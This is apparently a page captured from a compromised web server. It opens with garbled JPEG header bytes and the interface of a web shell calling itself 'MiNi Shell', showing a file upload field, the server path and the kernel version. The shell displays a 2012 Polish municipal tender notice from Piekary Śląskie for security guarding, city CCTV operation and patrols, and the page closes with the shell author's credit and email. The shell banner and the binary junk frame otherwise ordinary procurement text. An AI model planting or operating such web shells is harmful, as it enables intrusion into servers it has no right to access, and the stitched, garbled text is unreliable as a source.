JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121212/506856-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: 1.Zabezpieczenie i ochrona fizyczna osób oraz mienia, obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 i 92 i terenu wokół nich. Obsługa systemu telewizji dozorowej na terenie miasta Piekary Śląskie- monitoringu wizyjnego miasta. Patrolowanie terenu miasta Piekary Śląskie przez grupy interwencyjne.
2. Nadzór przy użyciu alarmu obiektów położonych w Piekarach Śląskich przy ul. ks. Jerzego Popiełuszki 17 i 9  stanowiących własność miasta Piekary Śląskie.</b><br>
<b>Numer ogłoszenia: 506856 - 2012; data zamieszczenia: 12.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Zabezpieczenie i ochrona fizyczna osób oraz mienia, obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 i 92 i terenu wokół nich. Obsługa systemu telewizji dozorowej na terenie miasta Piekary Śląskie- monitoringu wizyjnego miasta. Patrolowanie terenu miasta Piekary Śląskie przez grupy interwencyjne.
2. Nadzór przy użyciu alarmu obiektów położonych w Piekarach Śląskich przy ul. ks. Jerzego Popiełuszki 17 i 9  stanowiących własność miasta Piekary Śląskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I 

1. Zabezpieczenie i ochrona fizyczna osób oraz mienia obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 (Urząd Miasta i Urząd Stanu Cywilnego) oraz przy ul. Bytomskiej 92 wraz z terenami wokół nich. Zabezpieczenie i fizyczna ochrona obiektów Urzędu Miasta będą realizowane w systemie 24-godzinnym w dni wolne od pracy (w soboty, niedziele i święta), natomiast w dni robocze w godzinach:
a) poniedziałki od 16.45 do 7.30 dnia następnego
b) wtorki, środy czwartki od 15.15 do 7.30 dnia następnego
c) piątki od 13.45 do 7.30 w poniedziałek.
2. Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoring wizyjnego Miasta. Obsługa systemu monitoringu wizyjnego Miasta odbywać się będzie codziennie w systemie 24-godzinnym.
3. Patrolowanie terenu Miasta Piekary Śląskie przez grupy interwencyjne. Patrolowanie terenu odbywać się będzie codziennie w szczególności w godzinach 17.00 - 6.00, przez grupy interwencyjne liczące min. 2 pracowników wyposażonych w broń palną bojową oraz środki przymusu bezpośredniego (minimum 6 objazdów prewencyjnych w godzinach 17.00-6.00). Szczegółowy zakres zadań i obowiązków związanych z realizacją zamówienia określony jest w Załączniku nr 1 do umowy - Regulamin służby ochronnej i obsługi monitoringu miejskiego.
Wykonawca musi dysponować co najmniej 2 grupami interwencyjnymi minimum 2-osobowymi, działającymi w obrębie miasta Piekary Śląskie, wyposażonymi w broń palną bojową oraz środki przymusu bezpośredniego.
Wymagany czas dojazdu grupy interwencyjnej - nie dłuższy niż 7 min.
Do oferty należy dołączyć numer telefonu, nazwisko i ewentualne hasło do osoby koordynującej prace grupy interwencyjnej.

Część II

Nadzór przy użyciu alarmu obiektów położonych w Piekarach Śląskich przy ul. Ks. Jerzego Popiełuszki 17 i 9, stanowiących własność miasta Piekary Śląskie.
1. Zakres zamówienia:
a) Nadzór obiektów przy użyciu alarmu - całodobowy nadzór poprzez system podłączony do centrum monitorowania Wykonawcy oraz każdorazowe stawienie się na nieruchomości grupy interwencyjnej w chwili włączenia się systemu alarmowego w czasie 15 minut od chwili włączenia się alarmu;
b) Serwis konserwacyjny systemu alarmowego (jednorazowy przegląd systemu alarmowego zamontowanego na obiektach - w czerwcu 2013r.)
c) Zabezpieczenie obiektów własną ochroną fizyczną na zasadach wynikających z postanowień umowy. 
2. Charakterystyka obiektów podlegających monitoringowi
Budynek główny po byłym Dziennym Ośrodku Rehabilitacji Leczniczej (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Ks. Popiełuszki 17, o kubaturze 1663,95 m3 i powierzchni użytkowej 330,76 m2. Budynek wolnostojący, częściowo podpiwniczony, zbudowany w latach 30 tych XX wieku. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu wykonana ze stalowej więźby dachowej krytej blachą trapezówką na którą położona jest suprema i papa. Stolarka okienna i drzwiowa - nietypowa, okna drewniane podwójne, w piwnicach okna pojedyncze, drzwi drewniane typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną oraz C.O. Ogrzewanie z własnej kotłowni gazowej piecem II funkcyjnym, grzejniki żeliwne bez termostatów.
Oficyna Dziennego Ośrodka Rehabilitacji Leczniczej (pustostan), zlokalizowana w Piekarach Śląskich przy ulicy Ks. Popiełuszki 9, o kubaturze 351m3 i powierzchni użytkowej 157,25m2. Budynek oficyny wolnostojący, niepodpiwniczony. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu drewniana, kryta papą. Okna drewniane, drzwi drewniane, typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną, odgromową oraz C.O.
Budynek główny wraz oficyną jest ogrodzony z dwóch stron, brama wjazdowa wykonana z belek drewnianych na konstrukcji metalowej
Centrala systemu alarmowego została zamontowana w budynku głównym przy ul. Ks. Popiełuszki 17..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dotyczy tylko części I zamówienia     
Zamawiający żąda wniesienia wadium w wysokości 7 000,00 złotych.
Wadium może być wnoszone w jednej z form wskazanych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek
bankowy Zamawiającego prowadzony przez  ING Bank Śląski: nr  07 1050 1230 1000 0023 2549 4256. 
W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment uznania rachunku Zamawiającego.
Potwierdzenie wniesienia wadium w formie pieniężnej należy dołączyć do oferty. W przypadku złożenia wadium w formie poręczenia lub gwarancji bankowej bądź gwarancji ubezpieczeniowej należy załączyć oryginał dokumentu gwarancyjnego do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują uprawnieniami (koncesją) do prowadzenia działalności gospodarczej w zakresie przedmiotu zamówienia tj. usług w zakresie ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I

- wykonanie w ostatnich trzech latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 1 usługi w zakresie obsługi monitoringu  miejskiego  trwającego nieprzerwanie co najmniej 12 miesięcy w ciągu ostatnich 3 lat,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-dysponowanie całodobowym centrum monitorowania i pozwoleniem radiowym obowiązującym na terenie miasta Piekary Śląskie - dla części I i II</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie min. 21 osobami posiadającymi licencję ochrony fizycznej co najmniej I stopnia,
- dysponowanie min. 2 osobami posiadającymi licencję ochrony fizycznej II stopnia 
(w tym dysponowanie min. 11 osobami dodatkowo posiadającymi poświadczenie bezpieczeństwa osobowego upoważniającego do dostępu do informacji niejawnych do klauzuli Poufne do obsługi monitoringu wizyjnego) - dla części I</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I i II
posiadanie ubezpieczenia od odpowiedzialności cywilnej za szkody wynikłe z tytułu niewykonania lub nienależytego wykonania przedmiotu umowy w zakresie ochrony fizycznej na sumę nie mniejszą niż 3 000 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty - odrębnie dla każdej części</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie 
Biuro Zamówień Publicznych pok. 218
ul. Bytomska 84 
41-940 Piekary Śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2012 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie 
Biuro Zamówień Publicznych pok. 218
ul. Bytomska 84 
41-940 Piekary Śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zabezpieczenie i ochrona fizyczna osób oraz mienia, obiektów Urzędu Miasta Piekary Śląskie 
przy ul. Bytomskiej 84 i 92 i terenu wokół nich. Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoringu wizyjnego miast. Patrolowanie terenu miasta Piekary Śląskie przez grupy interwencyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zabezpieczenie i ochrona fizyczna osób oraz mienia obiektów Urzędu Miasta Piekary Śląskie przy ul. Bytomskiej 84 (Urząd Miasta i Urząd Stanu Cywilnego) oraz przy ul. Bytomskiej 92 wraz z terenami wokół nich. Zabezpieczenie i fizyczna ochrona obiektów Urzędu Miasta będą realizowane w systemie 24-godzinnym w dni wolne od pracy (w soboty, niedziele i święta), natomiast w dni robocze w godzinach:
a) poniedziałki od 16.45 do 7.30 dnia następnego
b) wtorki, środy czwartki od 15.15 do 7.30 dnia następnego
c) piątki od 13.45 do 7.30 w poniedziałek.
2. Obsługa systemu telewizji dozorowej na terenie Miasta Piekary Śląskie - monitoring wizyjnego Miasta. Obsługa systemu monitoringu wizyjnego Miasta odbywać się będzie codziennie w systemie 24-godzinnym.
3. Patrolowanie terenu Miasta Piekary Śląskie przez grupy interwencyjne. Patrolowanie terenu odbywać się będzie codziennie w szczególności w godzinach 17.00 - 6.00, przez grupy interwencyjne liczące min. 2 pracowników wyposażonych w broń palną bojową oraz środki przymusu bezpośredniego (minimum 6 objazdów prewencyjnych w godzinach 17.00-6.00). Szczegółowy zakres zadań i obowiązków związanych z realizacją zamówienia określony jest w Załączniku nr 1 do umowy - Regulamin służby ochronnej i obsługi monitoringu miejskiego.
Wykonawca musi dysponować co najmniej 2 grupami interwencyjnymi minimum 2-osobowymi, działającymi w obrębie miasta Piekary Śląskie, wyposażonymi w broń palną bojową oraz środki przymusu bezpośredniego.
Wymagany czas dojazdu grupy interwencyjnej - nie dłuższy niż 7 min.
Do oferty należy dołączyć numer telefonu, nazwisko i ewentualne hasło do osoby koordynującej prace grupy interwencyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nadzór przy użyciu alarmu obiektów położonych w Piekarach Śląskich przy ul. Ks. Jerzego Popiełuszki 17 i 9, stanowiących własność miasta Piekary Śląskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nadzór przy użyciu alarmu obiektów położonych w Piekarach Śląskich przy ul. Ks. Jerzego Popiełuszki 17 i 9, stanowiących własność miasta Piekary Śląskie.
1. Zakres zamówienia:
a) Nadzór obiektów przy użyciu alarmu - całodobowy nadzór poprzez system podłączony do centrum monitorowania Wykonawcy oraz każdorazowe stawienie się na nieruchomości grupy interwencyjnej w chwili włączenia się systemu alarmowego w czasie 15 minut od chwili włączenia się alarmu;
b) Serwis konserwacyjny systemu alarmowego (jednorazowy przegląd systemu alarmowego zamontowanego na obiektach - w czerwcu 2013r.)
c) Zabezpieczenie obiektów własną ochroną fizyczną na zasadach wynikających z postanowień umowy. 
2. Charakterystyka obiektów podlegających monitoringowi
Budynek główny po byłym Dziennym Ośrodku Rehabilitacji Leczniczej (pustostan), zlokalizowany w Piekarach Śląskich przy ulicy Ks. Popiełuszki 17, o kubaturze 1663,95 m3 i powierzchni użytkowej 330,76 m2. Budynek wolnostojący, częściowo podpiwniczony, zbudowany w latach 30 tych XX wieku. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu wykonana ze stalowej więźby dachowej krytej blachą trapezówką na którą położona jest suprema i papa. Stolarka okienna i drzwiowa - nietypowa, okna drewniane podwójne, w piwnicach okna pojedyncze, drzwi drewniane typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną oraz C.O. Ogrzewanie z własnej kotłowni gazowej piecem II funkcyjnym, grzejniki żeliwne bez termostatów.
Oficyna Dziennego Ośrodka Rehabilitacji Leczniczej (pustostan), zlokalizowana w Piekarach Śląskich przy ulicy Ks. Popiełuszki 9, o kubaturze 351m3 i powierzchni użytkowej 157,25m2. Budynek oficyny wolnostojący, niepodpiwniczony. Został wykonany w całości w technologii tradycyjnej o podłużnym układzie ścian nośnych. Konstrukcja dachu drewniana, kryta papą. Okna drewniane, drzwi drewniane, typu płycinowego. Budynek wyposażony w instalacje wodno - kanalizacyjną, elektryczną, odgromową oraz C.O.
Budynek główny wraz oficyną jest ogrodzony z dwóch stron, brama wjazdowa wykonana z belek drewnianych na konstrukcji metalowej
Centrala systemu alarmowego została zamontowana w budynku głównym przy ul. Ks. Popiełuszki 17..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com